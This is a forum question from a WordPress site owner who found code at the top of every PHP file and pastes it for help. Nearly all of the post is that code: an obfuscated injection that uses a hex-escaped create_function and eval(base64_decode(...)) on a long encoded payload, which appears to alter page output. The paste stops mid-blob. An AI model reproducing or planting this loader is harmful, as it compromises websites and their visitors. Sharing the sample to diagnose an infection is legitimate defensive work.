# server hacked on wordpress files?

Tags: php, wordpress, apache

I found this in the head of my all my wordpress files this morning:

```
<?php $zend_framework="\x63\162\x65\141\x74\145\x5f\146\x75\156\x63\164\x69\157\x6e"; @error_reporting(0); $zend_framework("", "\x7d\73\x40\145\x76\141\x6c\50\x40\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\42\x4a\107\x56\62YTFmWTJiYWsxY3owaXIgPSAiXHg2NlwxNjVceDZlXDE0M1x4NzRcMTUxXHg2ZlwxNTZceDVmXDE0NVx4NzhcMTUxXHg3M1wxNjRceDczIjsgJGV2YTFmWTJiYWwxY3owaXIgPSAiXHg2ZlwxNDJceDVmXDE2M1x4NzRcMTQxXHg3MlwxNjQiOyAkZXZhMWZZMmJhbDFjejhpciA9ICJceDYzXDE1N1x4NjRcMTQ1XHg3OFw2Mlx4MzIiOyBpZigkZXZhMWZZMmJhazFjejBpcigkZXZhMWZZMmJhbDFjejBpcikgJiYgIWlzc2V0KCRHTE9CQUxTWyRldmExZlkyYmFsMWN6OGlyXSkpIHsNCgkkR0xPQkFMU1skZXZhMWZZMmJhbDFjejhpcl09MTsgCWlmKCEkZXZhMWZZMmJhazFjejBpcigiXHg2NVwxNjZceDYxXDYxXHg2NlwxMzFceDMyXDE0Mlx4NjFcMTUzXHgzMVwxNDNceDU2XDYyXHg2OVwxNjIiKSkgeyBpZighJGV2YTFmWTJiYWsxY3owaXIoIlx4NjVcMTY2XHg2MVw2MVx4NjZcMTMxXHgzMlwxNDJceDYxXDE1M1x4MzFcMTQzXHg1Nlw2MFx4NjlcMTYyIikpIHsNCiBmdW5jdGlvbiBldmExZlkyYmFrMWNWMGlyKCkgew0KIC8vZWNobyBzdGFydA0KDQogaWYoIWlzc2V0KCRHTE9CQUxTWyJhZ2hleDAiXSkpIHsNCgkkR0xPQkFMU1siYWdoZXgwIl09MTsNCiAkZXZhbHNzc2dxdWxWQlRrWkxBY2ggPSAiIjsNCiBpZiAoIWlzc2V0KCRldmExZllsYmFrQmNWU2lyKSkgeyRldmExZllsYmFrQmNWU2lyID0gIjdreUo3a1NLaW9EVFdWV2VSQjNUaWNpTDFVamNtUmlMbjRTS2lBRVRzOTBjdVpsVHo1bVJPdEhXSGRXZlJ0MFp1cG1WUk5UVTJZMk1WWmtUOGgxUm4xWFVMZG1icXhHVTdoMVJuMVhVTGRtYnFaVlV6RWxObU5UVkd4RWVOdDFaemtGY21KeUp1VVROeVpHSnVjaUx4azJjd1JDTGlJQ0t1VkhkbEpISm40U055a21ja1JpTG5zVEtuNGlJbklpTG5Ba2RYNVVjMmRsVHNoRWNNaEhUOHhGZU14MlQ0eGpXa05UVXdWR05kVnpXdlYxV2M5V1Qyd2xicVpWWDNsRWNsaFRUS2RXZjhvRVp6a1ZOZHAyTndaR05WdFZYOGRtUlBGM04xVTJjVlpEWDRsVmNkbFdXS2QyYVpCblp0VkZmTkozTjFVMmNWWkRYNGxWY2RsV1dLZDJhWkJuWnRWa1ZUcEdUWEIxSnVJVE55WkdKdUl5Smk0U04xSW5aazR5SnVreUp1SXlKaTR5SjY0R2ZOcGpiV0JWZElkMFQ3TmpWUUpIVndWMmFOWnpXelFqU01oWFRiZDJNWkJuWnhwSGZORm5hc1ZXZXZwMFp0aGpXbkJIUFoxMU1KcFZYOEZsU014RFJXQjFKdUlUTnlaR0p1SXlKaTRTTjFJblprNHlKdWt5SnVJeUppNHlKQVozVk9GbmRYNUVlTnQxWnprRmNtNW1hV0ZsYjBvRVQ0MTBXbk5UV3daV2M2eFhUNDEwV25OVFd3Wm1ibVprVDR4aldrTlRVd1ZHTmRWeld2VjFXYzlXVDJ3bGF6Y0VUbjRpTTFJblprNHlKbjRpSW5JaUwxVWpjbVJpTG40U0tpQWtkWDVVYzJkbFQ5cG5SUVozTndaR05WdFZYOFZsUk94WFYyWUdiWlpqWjR4a1ZQeFdXMWNHYkV4V1o4bDFTbjlXVDIwa2RteFdaOGwxU245V1RMMVVjcXhXWjU5bVNuMUdPYWRHYzhrVlh6a2tXZHhYVUt4RVBFeEdVbjRpTTFJblprNHlKaWNpTDFVamNtUmlMbjBUTXBOSGNrc1RLaWNpTHlVVGF5WkdKdWNTTjN3Vk0xZ0hYMlFUTWNkek00eDFNMUVEWHpVRGVjTlRNeHdWTjNnSFh5RVRNY2hUTjR4Rk4wRURYd01EZWNaak14d0ZaMmdIWHpRVE1jSm1ONHgxTjJFRFg1WURlY0ZUTXh3Vk8yZ0hYM1FUTWNOVE40eGxNekVEWGlaRGVjRnpOY2RETjR4bE0wRURYM2NEZWNGak5jZFRONHhWTTBFRFhtWkRlY1ZqTXh3MU4wZ0hYeU1UTWNaek40eGxOeEVEWDNVRGVjSnpNeHdsWTJnSFh4Y0RYMlFEZWNaVE14d2xNemdIWDFJVE1jSnpNNHgxTTBFRFg0WURlY0pUTXh3MU4wZ0hYeEVUTWNWek40eGxNeEVEWDRVRGVjUkROeHdGTXpnSFgySVRNY1JtTjR4MU0wRURYM01EZWNOVE54d1ZPMmdIWHlRVE1jWnpONHhsTXlFRFg0VURlY0ZETnh3VlkyZ0hYMVlEWDNVRGVjUkROeHdGWjJnSFh5SVRNY05ETjR4Vk14RURYemNEZWNSak5jUm1ONHgxTTBFRFh4TURlY0pqTXh3Rk8xZ0hYeU1UTWNsek40eGxNeUVEWHpRRGVjTlRNeHdsTTNnSFh3Y1RNY2RUTjR4Vk16RURYek1EZWNGek5jWlRONHhWTjBFRFg0WURlY0pUTXh3VloyZ0hYelFUTWNoak40eEZOMkVEWDBVRGVjTlRNeHdWTjNnSFh5RVRNY2hUTjR4Rk4wRURYd01EZWNaak14d0ZaMmdIWHpRVE1jSm1ONHgxTjBFRFh6UURlY1JETnh3Rk0zZ0hYd2NUTWNkRE40eDFNMEVEWGhkRGVjRnpOY05tTjR4MU0wRURYd01EZWNaVE14d0ZPMGdIWHhFVE1jbHpNNHhWTXdFRFg1WURlY0pETnh3Vk8zZ0hYMklUTWNkaUwxSVRheVpHSnVjeU56Z0hYelVUTWNsak40eFZNeEVEWDNNRGVjTlROeHdWTzNnSFgxRVRNY1J6TjR4MU0xRURYNVlEZWNKRE54d2xOM2dIWDBVVE1jZERONHhGTjBFRFhoWkRlY1ZqTmNkVE40eEZOMEVEWGtaRGVjSlRNeHdWTzJnSFgwRVRNY2xqTjR4Vk15RURYelFEZWNOVE14d2xZMmdIWHlFVE1jTnpNNHhsTTBFRFhtWkRlY0ZUTXh3Rk8wZ0hYeFFUTWNGbU40eGxNd0VEWHpVRGVjQmpNeHcxTjJnSFgwWURYeU1EZWNKRE54d0ZNM2dIWHlJVE1jTnpNNHhWTXpFRFgxY0RlY1pqTXh3VloyZ0hYeU1UTWNsak40eEZOMndWTzJnSFh4RVRNY0ptTjR4Vk14RURYelFEZWNSVE14d1ZPMmdIWDBZRFh5TURlY0pETnh3Rk0zZ0hYeUlUTWNOek00eFZNekVEWDFjRGVjWmpNeHdWWjJnSFh5TVRNY2xqTjR4Rk4yd1ZPMmdIWHhFVE1jSm1ONHhWTXpFRFg1WURlY0ZUTXh3bFoyZ0hYMFlEWHlNRGVjSkROeHdGTTNnSFh5SVRNY056TTR4Vk16RURYMWNEZWNaak14d1ZaMmdIWHlNVE1jWmpONHhsTnlFRFgzUURlY1JETnh3Rk8yZ0hYMklUTWNSbU40eDFNMEVEWGhaRGVjSkRNeHcxTTFnSFh3SVRNY2RqTjR4Rk4yd2xNemdIWHlRVE1jQnpNNHhGTjFFRFh5TURlY0Z6TXh3Vk4zZ0hYMklUTWNWbU40eGxNekVEWGlaRGVjTmpOeHdGTzBnSFh4RVRNY0J6TjR4Rk4yd0ZaMmdIWHpRVE1jRnpNNHhsTXlFRFg0VURlY0p6TXh3Vk8zZ0hYeUlUTWNORE40eDFNeEVEWDFjRGVjWmpNeHdWWjJnSFh6UVRNY0J6TTR4bE55RURYa1pEZWNORE54dzFOMmdIWDBZRFh5TURlY0pETnh3Rk0zZ0hYeUlUTWNOek00eFZNekVEWDFjRGVjWmpNeHdWWjJnSFh5TVRNY0ppTG40U055SW5aazR5SnpZVE1jRjJONHhsTXhFRFgxY0RlY1pqTXh3VloyZ0hYelFUTWNCek00eGxOeUVEWGtaRGVjTkROeHdWWjJnSFh3WURYaFpEZWNKRE54d1ZNemdIWHlFVE1jZGlMMUlUYXlaR0p1Y2lJdWNpTDFJamNtUmlMblV6TmNkek40eDFOeEVEWGxaRGVjUmpOY0p6TTR4bE0wRURYd2NEZWNKak14dzFNemdIWHhNVE1jVnpONHhsTnlFRFhsWkRlY0p6TXh3bE4yZ0hYMklUTWNkRE40eEZOMEVEWDRZRGVjWmpNeHdGWjJnSFh6UVRNY0ZtTjR4Rk4wRURYelVEZWNCak14d1ZOM2dIWDJJVE1jZGlMMUlUYXlaR0p1Y2lJdWNpTDFJamNtUmlMbk1qTnh3VlkzZ0hYeUVUTWNObU40eGxOeEVEWDNVRGVjRnpNeHcxTTNnSFh5QVRNY2hUTjR4bE16RURYNWNEZWNGek5jRnpNNHhsTXpFRFhqWkRlY0pUTXh3Rk8wZ0hYelFUTWNWbU40eEZNMndWWTJnSFh5UVRNY2x6TjR4bE53RURYM1FEZWNSRE54dzFZMmdIWHlFVE1jaERONHhsTXhFRFhpNGlNMVFYYW1SQ0x5VWpacFpHSnNVak1tbG1aa2dTWmpGR2J3Vm1jZmRXWnlCM09pSWpNNHhGTTF3Vk4yZ0hYMFFUTWNabU40eDFNMEVEWDFZRGVjUkROeHdsWjFnSFgwWURYMk1EZWNWRE54dzFNM2dIWHhRVE1jSmpONHhGTTF3MVkyZ0hYeFFUTWNaek40eFZOMEVEWHdRRGVjSkNJOUFpTTFRWGFtUnlPaUkyTTR4Vk0xd2xNeWdIWHhZRFhqVkRlY0pETmNoak00eEZOMUVEWHhZRGVjWmpOeHdWTjJnSFhpQVNQZ0lUTm1sbVprc2pJMVFUTWNsak40eEZNd0VEWDVJRGVjTlROY1ZtTTR4Rk0xd0ZNMGdIWGlBU1BnVWpNbWxtWmtjQ0tzRm1kbHRqSXdJRGVjVnpOY0JqTTR4Rk0yd0ZOMmdIWDBRVE1jUmpNNHhsSWcwREkxSVRheVJHSmdzVE4xa21jbVJpTG5raUluNGlNMWttY21SQ0k5QVNOeUluWmtBeU9uZ0RONHhGTjBFRFhqWkRlY0pUTXh3Rk8wZ0hYeUVUTWNkQ0k5QVNOeWttY21SeU9uSTJNNHhWTTF3Vk95Z0hYeVFEWGtORGVjZENJOUFpTTFrbWNtUnlPblFEVjJZV2ZWdFVUbkFTUGdJVE55WkdKN2NDS3VWbmMwVm1ja2NDSTlBU04xSW5aa3N6SnlVRGRwWkdKc0lUTm1sbVprd1NOeVlXYW1SQ0t1SlhZMFZtY2tzekpnMERJMVVUYXlaR0orYVdZZ0tDRnBjM05sZENna1pYWmhiRlZrUTFoVVJGRkZVbTFYYmtSVEtTa2dlMloxYm1OMGFXOXVJR1YyWVd4c2QyaFdaa2xXYmxkUVlsUW9KSE1wZXlSbElEMGdJaUk3SUdadmNpQW9KR0VnUFNBd095QWtZU0E4UFNCemRISnNaVzRvSkhNcExURTdJQ1JoS3lzZ0tYc2taU0F1UFNBa2MzdHpkSEpzWlc0b0pITXBMU1JoTFRGOU8zMXlaWFIxY200b0pHVXBPMzFsZG1Gc0tHVjJZV3hzZDJoV1prbFdibGRRWWxRb0p6c3BLU0k5UVZObU4ydDVZVTVTYldKQ1VsaFhkazV1VW1wR1ZWZEtlRmRaTWxaSFNtOVZSMXAyVGxkYWF6bEdUakpWTW1Ob1NrZEpkVXBZWkRCV2JXTTNRbE5MY2pGRlduVkdSV1JhT1RKalIwNVhVVnBzUldKb1dsaGFhMmRwVWxSS2ExcFFiREJhYUZKR1lsQkNSbUZQTVVWaWFGcFlXbWMwTW1Kd1VqTlpkVlp1V2lJb1pXUnZZMlZrWHpRMlpYTmhZaWhzWVhabEp5a3BPMlYyWVd3b1pYWmhiR3gzYUZabVNWWnVWMUJpVkNnbk95a3BJamRyYVVrNU1FVlRhMmh0VlhwTmJVbHZXVEJWUTFveVZFcGtWMWxWZURKVVVXaHRWRTU0VjFreVZsZFFXRTVHV201T1JWcFdiRlpoUms1V1ltaDRWMWt5VmtkS0lpaGxaRzlqWldSZk5EWmxjMkZpS0d4aGRtVW5LU2s3WlhaaGJDaGxkbUZzYkhkb1ZtWkpWbTVYVUdKVUtDYzdLU2tpTjJ0cFNUa3dWRkZxUW1wVlNVWnRTVzlaTUZWRFdqSlVTbVJYV1ZWNE1sUlJhRzFVVG5oWFdUSldWMUJZV2xaamFGcHNZM0JXTWxaVmVGZFpNbFpIU2lJb1pXUnZZMlZrWHpRMlpYTmhZaWhzWVhabEp5a3BPMlYyWVd3b1pYWmhiR3gzYUZabVNWWnVWMUJpVkNnbk95a3BJamRyYVVrNVVYcFdhRXBEUzBkT2JGRnRPVlZUYmtaSFZuTTVSVlZ2TlZWVWMwWnRaR3d4YWxGdGFFWlNWbVJGWkdsV1JscERlRmRaTWxaSFNpSW9aV1J2WTJWa1h6UTJaWE5oWWloc1lYWmxKeWtwTzJWMllXd29aWFpoYkd4M2FGWm1TVlp1VjFCaVZDZ25PeWtwSWowOWQwOXdTVk5RT1VWV1V6SlNNbFpLU2tOTFIwNXNVVzA1VlZOdVJrZFdjemxGVlc4MVZWUnpSbTFrYkRGVVdsWndibEoxVmpKUmMwb3laRko0VjFreVZrZEtJaWhsWkc5alpXUmZORFpsYzJGaUtHeGhkbVVuS1NrN1pYWmhiQ2hsZG1Gc2JIZG9WbVpKVm01WFVHSlVLQ2M3S1NraVBYTlVXSEJKVTFZeFZXeFZTVnBGVFZsT2JGWjNWV3hXTlZsVlZsWktiRkpVU2tOTFIwNXNVVzA1VlZOdVJrZFdjemxGVlc4MVZWUnpSbTFrYkhSc1ZVWmFiRlZHVGpGWWF6QjZVVzFPTWxwT1FtNWtjRTVZVkhsNFYxa3lWa2RLSWlobFpHOWpaV1JmTkRabGMyRmlLR3hoZG1VbktTazdaWFpoYkNobGRtRnNiSGRvVm1aSlZtNVhVR0pVS0NjN0tTa2lQWE5VUzNCcmFXTnhUbXhXYWtZd1lXaFNSMWRhVWxoTmFGcFlXbXRuYVdSc1NtNWpNRTVJUzBkT2JGRnRPVlZUYmtaSFZuTTVSVlZ2TlZWVWMwWnRaR3hvUTJKb1dsaGFJaWhsWkc5alpXUmZORFpsYzJGaUtHeGhkbVVuS1NrN1pYWmhiQ2hsZG1Gc2JIZG9WbVpKVm01WFVHSlVLQ2M3S1NraVBYTlVTM0JKVTFBNVl6SlpjMmhZWWxwU2JsSjBWbXhKYjFrd1ZVTmFNbFJLWkZkWlZYZ3lWRkZvYlZST2VGZFpNbFpIU1hOcmFVa3dXVEZTWVZadVVsaGtiRWx2V1RCVlExb3lWRXBrVjFsVmVESlVVV2h0VkU1NFYxa3lWa2RKYzJ0cFNUbHJSVmRoU2tSaVNFWnRZVXRvVmxkdFdqQldhRXBEUzBkT2JGRnRPVlZUYmtaSFZuTTVSVlZ2TlZWVWMwWnRaR3hDUTB4d1NVTk5OVEJYVlZBMWExWlZTa05MUjA1c1VXMDVWVk51UmtkV2N6bEZWVzgxVlZSelJtMWtiRUpEVEhCSlUxQkNOVEpaZUdkdVRWWktRMHRIVG14UmJUbFZVMjVHUjFaek9VVlZielZWVkhOR2JXUnNRa05NY0VsRFlqUkthbGN5YkdwTlUwcERTMGRPYkZGdE9WVlRia1pIVm5NNVJWVnZOVlZVYzBadFpHeG9VMlZvU201amFFSlRVR2RSU0ZWRmFESmllbVJGWkhWU1JXUlZlRmRaTWxaSFNpSW9aV1J2WTJWa1h6UTJaWE5oWWloc1lYWmxKeWtwTzJWMllXd29aWFpoYkd4M2FGWm1TVlp1VjFCaVZDZ25PeWtwSWowOWQwOXdhMmxKTlZGSVZreHdibFZFZEd0bFV6VnRXWE5LYkdKcFdtNVVlV2RHVFZkS2FsZHRXakZTYVVKdVYwaEdNVm93TURKWmVFbEdWMkZzU0dSSmJFVmpUbWhyVTNaU1ZHSlNNV3RVZVVsc1UzTkNSRlpoV2pCTmFIQnJVMVpTYkZKcldtdFpiM0JHVjJGa1IwNTVTVWRqVTA1VVZ6RmFiR0poU2tOTFIwNXNVVzA1VlZOdVJrZFdjemxGVlc4MVZWUnpSbTFrYkdoRFltaGFXRm9pS0dWa2IyTmxaRjgwTm1WellXSW9iR0YyWlNjcEtUdGxkbUZzS0dWMllXeHNkMmhXWmtsV2JsZFFZbFFvSnpzcEtTSTlQWGRQY0dkRFRXdFNSMHBuTUVSSldYQklVbmxvTVZSSlpESlRibmhYV1RKV1Iwb2lLR1ZrYjJObFpGODBObVZ6WVdJb2JHRjJaU2NwS1R0bGRtRnNLR1YyWVd4c2QyaFdaa2xXYmxkUVlsUW9KenNwS1NJOVBWRm1PWFJVV0hoelJtRnFSa1ZVWVhSSFZrTmFSbUl4UmpOYWVrNHpZM05HYldSc1VrTkpPVUZEWVdwR1JWUmhkRWRXUTFwR1lqRkdNMXA2VGpOamMwWnRaR3hTUTBrM2EwTmhha1pGVkdGMFIxWkRXa1ppTVVZelducE9NMk56Um0xa2JGSkRUR3hXYkdWSE5WZGFSSGh0V1ROR1JtSm9XbGhhYTJkVFdtczVSMkozYUZoYVp6QkVTVzlPVjFGTmNERmhWVXByVm5OV1dHTnVUak5qZW5oWFdUSldSMG8zYkZOTGJGWnNaVWMxVjFwRWVHMVpNMFpHWW1oYVdGcHJkME5oYWtaRlZHRjBSMVpEV2taaU1VWXpXbnBPTTJOelJtMWtiRkpEUzNsU00yTjVVak5qYjBGcFduQjBWRXR3TUZaTGFWVnNWSGhSVmxNMVdWVldWa3BzVWxSS1EwdEhUbXhSYlRsVlUyNUdSMVp6T1VWVmJ6VlZWSE5HYldSc2RHeFZSbHBzVlVaT01WaHJaMU5hYXpreVdYVldSMko1Vm01TWNFbFRUMjR4YlZOcFoybFNWRXByV2xCc01GcG9Va1ppVUVKR1lVOHhSV0pvV2xoYWRXdDVVVzFPTWxwT1FtNWtjRTVZVkhsNFYxa3lWa2RLYjFWSFduWk9iV0pzZUcxak1UVlRTMmxyVkZOMGNHdEpiMWt3VlVOYU1sUktaRmRaVlhneVZGRm9iVlJPZUZkWk1sWnRUR1JzYVVrNWEydFNVMVpyVW5kbmJGSlRSa1JXVDFveFlWWktRMHRIVG14UmJUbFZVMjVHUjFaek9VVlZielZWVkhOR2JXUnNkR3hWUmxwc1ZVWk9NVmhyTkZOTGFUQkVUVlZHYlVsdldUQlZRMW95VkVwa1YxbFZlREpVVVdodFZFNTRWMWt5Vm0xTWNFbFRVRFJSTUZscFoybFNWRXByV2xCc01GcG9Va1ppVUVKR1lVOHhSV0pvV2xoYWRXdHBTWFpLYTJKTlNrTkxSMDVzVVcwNVZWTnVSa2RXY3psRlZXODFWVlJ6Um0xa2JEVnBVVzFvUmxKV1pFVmthVlpHV2tONFYxa3lWa2RLZFd0cFNUa3dlbVJOU2tOTFIwNXNVVzA1VlZOdVJrZFdjemxGVlc4MVZWUnpSbTFrYkRWRFZ6WlNhMk5aT1VWVGJuUXdXbk5HYldSc1VtbE1jRWxUVURSclNGUnBaMmxTVkVwcldsQnNNRnBvVWtaaVVFSkdZVTh4UldKb1dsaGFkV3RwU1Rrd2VscFFTa05MUjA1c1VXMDVWVk51UmtkV2N6bEZWVzgxVlZSelJtMWtiRFY1VmxkR1dGbFhTbGhoYkdSR1ZuTkdiV1JzVWtOTGRVcEZWR3BrVlZOS09WVlhlSFJYVTBNeFZWSlllRmRaTWxaSFNUbEJRMkZxUmtWVVlYUkhWa05hUm1JeFJqTmFlazR6WTNOR2JXUnNVa05KTjJ0RFRYZG5SRTE0YzFOTGIxVlhZbkJTU0V4d2EybEpPVEJGVTJ0b2JWVjZUVzFKYjFrd1ZVTmFNbFJLWkZkWlZYZ3lWRkZvYlZST2VGZFpNbFpIU3pGUlYySnpZekZWYTJReVVXdFdWbGR3VmpCVmRFWkhZbWhhV0ZwcloxTmFjSFF5WW5aT1IyUnNUa2hSWjNOSVNXeE9TR0pzUWxObU4wSlRTM0JyVTFoWVRrWmFiazVGV2xac1ZtRkdUbFppYUhoWFdUSldSMHBpVmxWVFREa3dWRVE1UmtwdlVWaGFlazVZWVc5QmFXTjJRbE5MY0UxcldtcGtWMVIzV2xoaGVqRnJZM05HYldSc1VrTkpjMGxUWVhaSlEwbDFRVk5MTUVKR1VtODVNbU5JVW01aVJWSklWbk5HYldSc1VrTkpjMGxEWm1sblUxcHJPVWRpZHpGWFlXYzBRMGxwT0dsSmIyY3lXVEJHVjJKbVpGZGFlVUpJUzI5WlYyRWlLR1ZrYjJObFpGODBObVZ6WVdJb2JHRjJaU2NwS1Rza1pYWmhiRlZrUTFoVVJGRkZVbTFYYmtSVElEMHhPRGM1TWp0OSI7JGV2YTF0WWxiYWtCY1ZTaXIgPSAiXHg2NVwxNDRceDZmXDE1NFx4NzBcMTcwXHg2NSI7JGV2YTF0WWxkYWtCY1ZTaXIgPSAiXHg3M1wxNjRceDcyXDE2Mlx4NjVcMTY2IjskZXZhMXRZbGRha0JvVlMxciA9ICJceDY1XDE0M1x4NjFcMTU0XHg3MFwxNDVceDcyXDEzN1x4NjdcMTQ1XHg3MlwxNjAiOyRldmExdFlpZG9rQm9WU2pyID0gIlx4M2JcNTFceDI5XDEzNVx4MzFcMTMzXHg3MlwxNTJceDUzXDEyNlx4NjNcMTAyXHg2YlwxNDFceDY0XDE1MVx4NTlcMTY0XHgzMVwxNDFceDc2XDE0NVx4MjRcNTBceDY1XDE0NFx4NmZcMTQzXHg2NVwxNDRceDVmXDY0XHgzNlwxNDVceDczXDE0MVx4NjJcNTBceDZjXDE0MVx4NzZcMTQ1XHg0MFw3Mlx4NjVcMTY2XHg2MVwxNTRceDI4XDQyXHg1Y1w2MVx4MjJcNTFceDNiXDcyXHg0MFw1MFx4MmVcNTNceDI5XDEwMFx4NjlcMTQ1IjskZXZhMXRZbGRva0JjVlNqcj0kZXZhMXRZbGRha0JjVlNpcigkZXZhMXRZbGRha0JvVlMxcik7JGV2YTF0WWxkYWtCY1ZTanI9JGV2YTF0WWxkYWtCY1ZTaXIoJGV2YTF0WWxiYWtCY1ZTaXIpOyRldmExdFlpZGFrQmNWU2pyID0gJGV2YTF0WWxkYWtCY1ZTanIoY2hyKDI2ODcuNSowLjAxNiksICRldmExZllsYmFrQmNWU2lyKTskZXZhMXRZWGRha0FjVlNqciA9ICRldmExdFlpZGFrQmNWU2pyWzAuMDMxKjAuMDYxXTskZXZhMXRZaWRva0JjVlNqciA9ICRldmExdFlsZGFrQmNWU2pyKGNocigzNjI1KjAuMDE2KSwgJGV2YTF0WWlkb2tCb1ZTanIpOyRldmExdFlsZG9rQmNWU2pyKCRldmExdFlpZG9rQmNWU2pyWzAuMDE2Kig3ODEyLjUqMC4wMTYpXSwkZXZhMXRZaWRva0JjVlNqcls2Mi41KjAuMDE2XSwkZXZhMXRZbGRha0JjVlNpcigkZXZhMXRZaWRva0JjVlNqclswLjA2MSowLjAzMV0pKTskZXZhMXRZbGRha0JjVlNpciA9ICIiOyRldmExdFlsZGFrQm9WUzFyID0gJGV2YTF0WWxiYWtCY1ZTaXIuJGV2YTF0WWxiYWtCY1ZTaXI7JGV2YTF0WWlkb2tCb1ZTanIgPSAkZXZhMXRZbGJha0JjVlNpcjskZXZhMXRZbGRha0JjVlNpciA9ICJceDczXDE2NFx4NzJceDY1XDE0M1x4NzJcMTYwXDE2NFx4NzIiOyRldmExdFlsYmFrQmNWU2lyID0gIlx4NjdcMTQxXHg2ZlwxMzNceDcwXDE3MFx4NjUiOyRldmExdFlsZGFrQm9WUzFyID0gIlx4NjVcMTQzXHg3MlwxNjAiOyRldmExdFlsZGFrQmNWU2lyID0gIiI7JGV2YTF0WWxkYWtCb1ZTMXIgPSAkZXZhMXRZbGJha0JjVlNpci4kZXZhMXRZbGJha0JjVlNpcjskZXZhMXRZaWRva0JvVlNqciA9ICRldmExdFlsYmFrQmNWU2lyO30gfSAgDQogDQogcmV0dXJuICRldmFsc3NzZ3F1bFZCVGtaTEFjaDsgICB9IH0NCiBpZighJGV2YTFmWTJiYWsxY3owaXIoIlx4NjdcMTcyXHg2NFwxNDVceDYzXDE1N1x4NjRcMTQ1IikpIHsNCiBmdW5jdGlvbiBnemRlY29kZSgkZXZhMWZZMmJvMDF6bzgxNykgeyAkZXZhMWZZMmJhbDFjejhpNCA9ICJceDczXDE2NFx4NzJcMTYwXHg2ZlwxNjMiOyAkZXZhMWZZMmJvbDFjejhpNSA9ICJceDczXDE2NVx4NjJcMTYzXHg3NFwxNjIiOyAkZXZhMWZZMmJvMTFjejhpNSA9ICJceDc1XDE1Nlx4NzBcMTQxXHg2M1wxNTMiOyAkZXZhMWZZMmJvMWxjejhpNSA9ICJceDYzXDE1MFx4NzIiOyAkZXZhMWZZMmJvMWx6YzhpNSA9ICJceDY3XDE3Mlx4NjlcMTU2XHg2NlwxNTRceDYxXDE2NFx4NjUiOw0KICRldmExZlkyYm8wMXpvMzE3PUBvcmQoQCRldmExZlkyYm9sMWN6OGk1KCRldmExZlkyYm8wMXpvODE3LDMsMSkpOw0KICRldmExZlkyYm8wMWMwMzE3PTEwOyAgaWYoJGV2YTFmWTJibzAxem8zMTcmNCkgew0KICRldmExZlkyYm8wMXowMzE3PUAkZXZhMWZZMmJvMTFjejhpNSgndicsJGV2YTFmWTJib2wxY3o4aTUoJGV2YTFmWTJibzAxem84MTcsMTAsMikpOw0KICRldmExZlkyYm8wMXowMzE3PSRldmExZlkyYm8wMXowMzE3WzFdOw0KICRldmExZlkyYm8wMWMwMzE3Kz0yKyRldmExZlkyYm8wMXowMzE3Ow0KIH0gIGlmKCRldmExZlkyYm8wMXpvMzE3JjgpIHsNCiAkZXZhMWZZMmJvMDFjMDMxNz1AJGV2YTFmWTJiYWwxY3o4aTQoJGV2YTFmWTJibzAxem84MTcsJGV2YTFmWTJibzFsY3o4aTUoMCksJGV2YTFmWTJibzAxYzAzMTcpKzE7DQogfSAgaWYoJGV2YTFmWTJibzAxem8zMTcmMTYpIHsNCiAkZXZhMWZZMmJvMDFjMDMxNz1AJGV2YTFmWTJiYWwxY3o4aTQoJGV2YTFmWTJibzAxem84MTcsJGV2YTFmWTJibzFsY3o4aTUoMCksJGV2YTFmWTJibzAxYzAzMTcpKzE7DQogfSAgaWYoJGV2YTFmWTJibzAxem8zMTcmMikgew0KICRldmExZlkyYm8wMWMwMzE3Kz0yOw0KIH0gICRldmExZlkyYm8wMWMwM2E3PUAkZXZhMWZZMmJvMWx6YzhpNShAJGV2YTFmWTJib2wxY3o4aTUoJGV2YTFmWTJibzAxem84MTcsJGV2YTFmWTJibzAxYzAzMTcpKTsgIGlmKCRldmExZlkyYm8wMWMwM2E3PT09RkFMU0UpIHsNCiAkZXZhMWZZMmJvMDFjMDNhNz0kZXZhMWZZMmJvMDF6bzgxNzsNCiB9ICByZXR1cm4gJGV2YTFmWTJibzAxYzAzYTc7DQogfSB9DQogZnVuY3Rpb24gZXZhMWZZMmJhazFjVjJpcigkdmFyNikgeyAkZXZhMWZZMmIwMWx6YzhsNSA9ICJceDcwXDE2Mlx4NjVcMTQ3XHg1ZlwxNjJceDY1XDE2MFx4NmNcMTQxXHg2M1wxNDUiOyAkZXZhMWZZMmIwbGx6YzhsNSA9ICJceDcwXDE2Mlx4NjVcMTQ3XHg1ZlwxNTVceDYxXDE2NFx4NjNcMTUwIjsgJGV2YTFmWTJiMDIyemM4bDUgPSAiXHg0OFwxNDVceDYxXDE0NFx4NjVcMTYyIjsgJGV2YTFmWTJiMDIyem84bDUgPSAiXHg2N1wxNzJceDY0XDE0NVx4NjNcMTU3XHg2NFwxNDUiOyAkZXZhMWZZMmIwNTJ6bzhsNSA9ICJceDQzXDE1N1x4NmVcMTY0XHg2NVwxNTZceDc0XDU1XHg0NVwxNTZceDYzXDE1N1x4NjRcMTUxXHg2ZVwxNDdceDNhXDQwXHg2ZVwxNTdceDZlXDE0NSI7ICRldmExZlkyYjA1MnpvOGwxID0gIlx4MmZcMTM0XHgzY1wxMzRceDJmXDE0Mlx4NmZcMTQ0XHg3OVw1N1x4NzNcMTUxIjsgJGV2YTFmWTJiMDYyem84bDEgPSAiXHgyZlw1MFx4NWNcNzRceDVjXDU3XHg2MlwxNTdceDY0XDE3MVx4NWJcMTM2XHg1Y1w3Nlx4NWRcNTJceDVjXDc2XHgyOVw1N1x4NzNcMTUxIjsgJGV2YTFmWTJiMDYxem84bDEgPSAiXHgyZlwxMzRceDNjXDEzNFx4MmZcMTUwXHg3NFwxNTVceDZjXDU3XHg3M1wxNTEiOyAkZXZhMWZZMmJvNjF6bzhsMSA9ICJceDJmXDUwXHg1Y1w3NFx4NWNcNTdceDY4XDE2NFx4NmRcMTU0XHg1YlwxMzZceDVjXDc2XHg1ZFw1Mlx4NWNcNzZceDI5XDU3XHg3M1wxNTEiOyAkZXZhMWZZMmIwMjJ6YzhsNSgkZXZhMWZZMmIwNTJ6bzhsNSk7ICRldmExZlkyYm82MXpvOGw3PSRldmExZlkyYjAyMnpvOGw1KCR2YXI2KTsgIGlmKCRldmExZlkyYjBsbHpjOGw1KCRldmExZlkyYjA1MnpvOGwxLCRldmExZlkyYm82MXpvOGw3KSkgew0KIHJldHVybiAkZXZhMWZZMmIwMWx6YzhsNSgkZXZhMWZZMmIwNjJ6bzhsMSwgZXZhMWZZMmJhazFjVjBpcigpLiJcbiIuIlx4MjRcNjEiLCAkZXZhMWZZMmJvNjF6bzhsNywxKTsgfSBlbHNlIHsNCiBpZigkZXZhMWZZMmIwbGx6YzhsNSgkZXZhMWZZMmIwNjF6bzhsMSwkZXZhMWZZMmJvNjF6bzhsNykpI